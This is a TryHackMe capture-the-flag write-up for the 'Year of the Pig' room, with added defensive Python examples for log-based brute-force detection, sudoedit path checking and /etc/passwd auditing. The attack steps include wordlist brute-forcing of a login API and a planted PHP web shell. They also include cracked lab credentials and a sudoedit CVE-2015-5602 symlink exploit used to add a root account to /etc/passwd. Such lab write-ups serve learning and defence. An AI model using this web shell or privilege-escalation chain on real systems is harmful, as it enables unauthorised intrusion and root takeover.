Year of the Pig - TryHackMe

noobsixt9
7 min read · Jul 3, 2022

Hello hacker, I assume you are here because you are stuck and don’t know what to do next, right? Worry not, I am here. With that, let’s start with enumeration using nmap:

We can see there are two open ports, HTTP and SSH. Let’s check HTTP.

We see a quite attractive webpage about planes and Marco’s love for them. Let’s fuzz some web directories and subdomains.

Here we see two interesting directories, admin and api. Let’s check them. When we visit /admin it redirects us to login.php, which is a login page. When I fooled around I found out it is sending the username and password to an API in JSON format, and also hashing our entered password with MD5.

And not only that, we also got a hint saying:

Remember that passwords should be a memorable word, followed by two numbers and a special character

Time to read, boys. After reading, I found a word which matches the description of the hint:

“SavoiaS21”. Let’s create a wordlist using this word.

savoia21
savoias21
SavoiaS21
Savoia21

Save this in a txt file. This matches the description, but there is one little thing missing: yes, the last character is supposed to be a special character. How do we add that and turn the list above into a proper wordlist? Ever heard about john? Let’s edit the config file and add our custom rule to generate the wordlist. How to do it? Worry not, just follow me.

sudo nano /etc/john/john.conf

After that, scroll down and you will see the existing rule sections.

Worry not, it’s nothing scary. Just below this, add:

[List.Rules:marco]
Az"[!?#$%&/()=]"

Save it, and now it’s time to generate the wordlist. Nothing more; just paste the command below and hit enter, and you will get your wordlist, sir.

john --wordlist=special_word.txt --rules=marco --stdout > wordlist.txt

Now you have a wordlist and a login page; what are we missing? Oh right, we have to hash the passwords and send them to api/login in JSON format. How do we do that, lord? Python. Yes, we create our own script, hehe, sounds cool, eh?

Here is the code that will help you with our problem. It’s messy because I am a total novice programmer. Make sure you change the directory path for the wordlist, and also don’t forget to change the IP to THM’s IP. Let’s hit that code with our freshly generated wordlist.

We got our password, but we got something extra too, haha; well, ignore that, I’m too lazy to debug the code. Our password is savoia21!
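Hashing the password with MD5 on the client side, as this login API does, gives no protection against the guessing script above: the wordlist is simply hashed before it is sent. What does help a defender is noticing the burst of failed logins. As an added example (not part of the original writeup), here is a small Python detector run over constructed web-server access-log lines in combined log format. The IP addresses, timestamps and log lines are made up, the API is assumed to answer 401 on a failed login and 200 on success, and the threshold of five failures per minute is an arbitrary choice.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the room); IPs and times are made up.
# The brute-forcer at 10.10.14.5 hammers /api/login and finally gets a 200.
SAMPLE_LOG = """\
10.10.14.5 - - [03/Jul/2022:10:00:01 +0000] "POST /api/login HTTP/1.1" 401 45
10.10.14.5 - - [03/Jul/2022:10:00:01 +0000] "POST /api/login HTTP/1.1" 401 45
10.10.14.5 - - [03/Jul/2022:10:00:02 +0000] "POST /api/login HTTP/1.1" 401 45
10.10.14.5 - - [03/Jul/2022:10:00:02 +0000] "POST /api/login HTTP/1.1" 401 45
10.10.14.5 - - [03/Jul/2022:10:00:03 +0000] "POST /api/login HTTP/1.1" 401 45
10.10.14.5 - - [03/Jul/2022:10:00:04 +0000] "POST /api/login HTTP/1.1" 200 120
10.10.14.5 - - [03/Jul/2022:10:00:05 +0000] "GET /admin/index.php HTTP/1.1" 200 512
192.168.1.20 - - [03/Jul/2022:10:00:07 +0000] "POST /api/login HTTP/1.1" 401 45
192.168.1.20 - - [03/Jul/2022:10:05:00 +0000] "POST /api/login HTTP/1.1" 200 120
this line is garbage and must be skipped
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def find_bruteforce(log_text, path="/api/login", threshold=5,
                    window=timedelta(seconds=60)):
    """Report IPs with >= threshold failed POSTs to `path` inside a sliding window.

    Returns {ip: {"failures": peak_failures_in_window,
                  "success_after_burst": True if a 200 followed such a burst}}.
    A 200 right after a burst of 401s is the signal that a guess worked.
    """
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"] == path:
            attempts[ev["ip"]].append((ev["ts"], ev["status"]))

    alerts = {}
    for ip, events in attempts.items():
        events.sort(key=lambda e: e[0])       # stable: keeps log order on ties
        recent_failures = []                  # timestamps still inside the window
        peak = 0
        success_after_burst = False
        for ts, status in events:
            recent_failures = [t for t in recent_failures if ts - t <= window]
            if status == 401:
                recent_failures.append(ts)
                peak = max(peak, len(recent_failures))
            elif status == 200 and len(recent_failures) >= threshold:
                success_after_burst = True
        if peak >= threshold:
            alerts[ip] = {"failures": peak,
                          "success_after_burst": success_after_burst}
    return alerts


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed logins within a minute, "
              f"success afterwards: {info['success_after_burst']}")
```

The same sliding-window idea is what a rate limiter on the API would enforce in real time; here it is applied after the fact to the log, which is the cheaper place to start when you cannot change the application.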

Let’s log in and see what Marco has there for us.

We can see there are many pages. After checking all of them we find out that there is another user named curtis, which might be useful later, who knows, right? Another interesting page is commands, where we can execute commands, hehehe, yeah boi, that’s what we are looking for, right? Yes, but no, it’s not that, guys; it only executes ls and whoami. That’s depressing.

Flag 1

What next? Let’s recall everything: we enumerated the IP and found out there were 2 open ports, one was HTTP and the other was SSH. Wow! We almost forgot about SSH. Let’s try it with the credentials we just found from auth.py.

Bingo!

Congratulations, boys, we got our first flag.

Flag 2

Let’s enumerate further. We see there is another user named curtis. In his home directory we see another flag, and now we want it but can’t get it. After fooling around I found out that there is a file in /var/www/ named admin.db which contains the password of curtis. But we don’t have permission for that. I fooled around again and found out we can edit commands.php in /var/www/html/admin. Let’s edit that with the following code:

<?php
echo system($_REQUEST['cmd']);
?>

And now change the permissions of the admin.db file with the following commands:

Store the MD5 hash of curtis in hash.txt, and now it’s time to crack it. You can use john, hashcat, or online sites to crack it.

a80bfe309ecaafcea1ea6cb3677971f2

I used john, and the password for curtis is: Donald1983$. Now use su curtis and enter the password, and you will get your shell. And you got your second flag.

Root Flag

Let’s run sudo -l in the curtis shell. We see the user is allowed to run /usr/bin/sudoedit as sudo against certain files in /var/www/html.

User curtis may run the following commands on year-of-the-pig:
(ALL : ALL) sudoedit /var/www/html/*/*/config.php

I searched for a while and found out sudoedit is designed not to be exploitable, but there is an exploit for versions lower than 1.8.14, CVE-2015-5602. So, I checked the version.

curtis@year-of-the-pig:~$ sudo --version
Sudo version 1.8.13
Sudoers policy plugin version 1.8.13
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.13

This confirms sudoedit is vulnerable to CVE-2015-5602. To trigger this sudoers configuration we need a file called config.php two directories under /var/www/html. But we have a problem: curtis is not a member of the web developer group, so we have to go back to the marco shell to create such a path.

curtis@year-of-the-pig:~$ exit
exit
marco@year-of-the-pig:~$ mkdir -p /var/www/html/dir1
marco@year-of-the-pig:~$ chmod 777 /var/www/html/dir1

Now that we have a valid path and any user on the machine can read, write and execute the dir1 directory, curtis will be able to create directories inside dir1. We need to symlink config.php to something important, for example /etc/passwd. For whom symlink sounds new: it’s basically a shortcut file, just like in Windows. You can check out this blog for more info. Change shell to curtis and follow the commands below:

curtis@year-of-the-pig:~$ mkdir /var/www/html/dir1/dir2
curtis@year-of-the-pig:~$ ln -s /etc/passwd /var/www/html/dir1/dir2/config.php

Time to activate sudo permissions.

curtis@year-of-the-pig:~$ sudoedit /var/www/html/dir1/dir2/config.php

We should now have edit access to the /etc/passwd file!
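What makes the sudoers rule above dangerous is that its wildcards cover directories a low-privileged user can create, and the sudo on this box (1.8.13) happily follows the symlink placed there. The fix shipped in sudo 1.8.15 as the sudoedit_checkdir option (on by default): sudoedit refuses to edit a file when any directory on its path is writable by the invoking user, and it does not follow symlinks unless sudoedit_follow is enabled. As an added example, not part of the writeup and not sudo’s own code, here is a simplified Python model of that check, run against a copy of the dir1/dir2/config.php layout rebuilt under a temporary directory. Assumptions: uid 424242 stands in for curtis, a temp file stands in for /etc/passwd, and only the classic mode bits are examined (no ACLs), so this is a teaching model.

```python
import os
import stat
import tempfile

FAKE_UID = 424242  # constructed uid standing in for the invoking user (curtis)


def _writable_by(st, uid, gids):
    """Classic mode-bit check: can a user with this uid/gids write to the inode?
    (Ignores ACLs and root's override; enough for a teaching model.)"""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def sudoedit_target_is_safe(path, allowed_root, uid, gids=()):
    """Model of sudo's sudoedit_checkdir / no-follow behaviour.

    Returns (True, "ok") or (False, reason). Refuses when the target is a
    symlink, when it resolves outside allowed_root, or when any directory
    between allowed_root and the file is writable by the invoking user.
    """
    allowed_root = os.path.realpath(allowed_root)
    if os.path.islink(path):
        return False, "target is a symlink"
    resolved = os.path.realpath(path)
    if os.path.commonpath([resolved, allowed_root]) != allowed_root:
        return False, "resolves outside allowed root"
    rel = os.path.relpath(os.path.dirname(resolved), allowed_root)
    parts = [] if rel == "." else rel.split(os.sep)
    current = allowed_root
    for part in parts:
        current = os.path.join(current, part)
        if _writable_by(os.lstat(current), uid, gids):
            return False, f"directory {part!r} on the path is writable by uid {uid}"
    return True, "ok"


def demo():
    """Rebuild the dir1/dir2/config.php trick under a temp dir and evaluate it
    next to a properly owned config.php. Returns a dict of (safe, reason)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        webroot = os.path.join(tmp, "html")          # stands in for /var/www/html
        os.mkdir(webroot)
        os.chmod(webroot, 0o755)
        secret = os.path.join(tmp, "passwd")         # stands in for /etc/passwd
        with open(secret, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")

        # the layout from the walkthrough: world-writable dir1, then dir2 and a symlink
        dir1 = os.path.join(webroot, "dir1")
        dir2 = os.path.join(dir1, "dir2")
        os.makedirs(dir2)
        os.chmod(dir1, 0o777)
        os.chmod(dir2, 0o755)
        link = os.path.join(dir2, "config.php")
        os.symlink(secret, link)
        results["symlink_trick"] = sudoedit_target_is_safe(link, webroot, FAKE_UID)

        # a legitimate site: directories not writable by the invoking user, regular file
        inc = os.path.join(webroot, "site", "inc")
        os.makedirs(inc)
        os.chmod(os.path.join(webroot, "site"), 0o755)
        os.chmod(inc, 0o755)
        good = os.path.join(inc, "config.php")
        with open(good, "w") as fh:
            fh.write("<?php\n")
        results["regular_file"] = sudoedit_target_is_safe(good, webroot, FAKE_UID)

        # same regular file, but once its directory is world-writable it is refused too
        os.chmod(inc, 0o777)
        results["writable_parent"] = sudoedit_target_is_safe(good, webroot, FAKE_UID)
    return results


if __name__ == "__main__":
    for case, (safe, reason) in demo().items():
        print(f"{case}: {'allowed' if safe else 'refused'} ({reason})")
```

The directory walk is the important part: the symlink alone is easy to refuse, but a world-writable intermediate directory lets the user swap in any file later, so the check has to cover every component under the allowed root. The configuration-side mitigation is the same in spirit: upgrade sudo and avoid wildcard sudoedit rules that span directories the user can create.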

Now that we can edit the /etc/passwd file, we can add our own user here and give root access to our user. We can do that with the following simple commands:

Generate our password hash using openssl.

Add our user to the /etc/passwd file.

If you don’t know how to use the vim editor, first press ‘i’ to switch into insert mode, then add the username and hashed password in the following format:

<username>:<hashed-password>:0:0::/root:/bin/bash

After that, press ‘esc’ and type ‘:wq’ to save and exit vim. Now su <your username>, enter the password, and you’ve got your root shell.
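Adding a second UID 0 account with a hash stored directly in /etc/passwd is a classic persistence trick, and it is also easy to spot. As an added example (not part of the writeup), here is a Python audit of /etc/passwd content that flags extra UID-0 users, password hashes stored in the second field instead of the “x” that defers to /etc/shadow, empty passwords, duplicate UIDs and malformed lines. The sample file content is constructed and the hash is a placeholder, not a real crypt string.

```python
# Constructed /etc/passwd content for the demo; the hash is a placeholder, not real.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marco:x:1000:1000:Marco:/home/marco:/bin/bash
curtis:x:1001:1001::/home/curtis:/bin/bash
backdoor:$1$xyz$PLACEHOLDERNOTAREALHASH:0:0::/root:/bin/bash
guest::1002:1002::/home/guest:/bin/bash
broken line without fields
"""

LOCKED = {"*", "!", "!!"}   # conventional "no login possible" markers


def audit_passwd(text):
    """Return a list of (line_no, finding, account) tuples for suspicious entries."""
    findings = []
    seen_uids = {}
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed entry", line))
            continue
        name, pw, uid_s, _gid, _gecos, _home, _shell = fields
        try:
            uid = int(uid_s)
        except ValueError:
            findings.append((line_no, "non-numeric uid", name))
            continue
        if uid == 0 and name != "root":
            findings.append((line_no, "extra uid-0 account", name))
        if uid in seen_uids:
            findings.append((line_no, "duplicate uid", name))
        else:
            seen_uids[uid] = name
        if pw == "":
            findings.append((line_no, "empty password", name))
        elif pw != "x" and pw not in LOCKED:
            # a hash here is checked directly by login, bypassing /etc/shadow
            findings.append((line_no, "password hash in passwd field", name))
    return findings


if __name__ == "__main__":
    for line_no, finding, account in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {finding}: {account}")
```

Run against a real system this is a one-shot check; the longer-term control is file integrity monitoring on /etc/passwd and /etc/shadow, which would also have caught the sudoedit write itself.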

Navigate to /root; there you can see your root flag waiting for you to cat it and see what’s inside.

Conclusion

This was a really fun and easy one. HAHA, just kidding, bro, it was freaking hard, but very educational: we learned the usage of Python scripts to assist us in penetration testing, a vulnerable version of sudoedit and how to exploit it, what a symlink is, how to edit /etc/passwd, hash cracking, APIs, different Python modules, bruteforcing and all. I want to thank the creator of this amazing room, MuirlandOracle, and thank you so much, TryHackMe, for all these amazing CTFs.

Cybersecurity is really vast; you and I have just touched the surface of it. There is so much to learn. So, let’s learn together; follow me on Twitter. It’s totally alright to look at writeups while you’re stuck; I do that too, and so does everyone else. No one is an expert, no one is perfect. Everything and everyone is vulnerable, but it’s up to us whether we patch our vulnerabilities or leave them as they are. With that said, we have to say goodbye till next time. Keep learning, keep hacking. See you ❤.
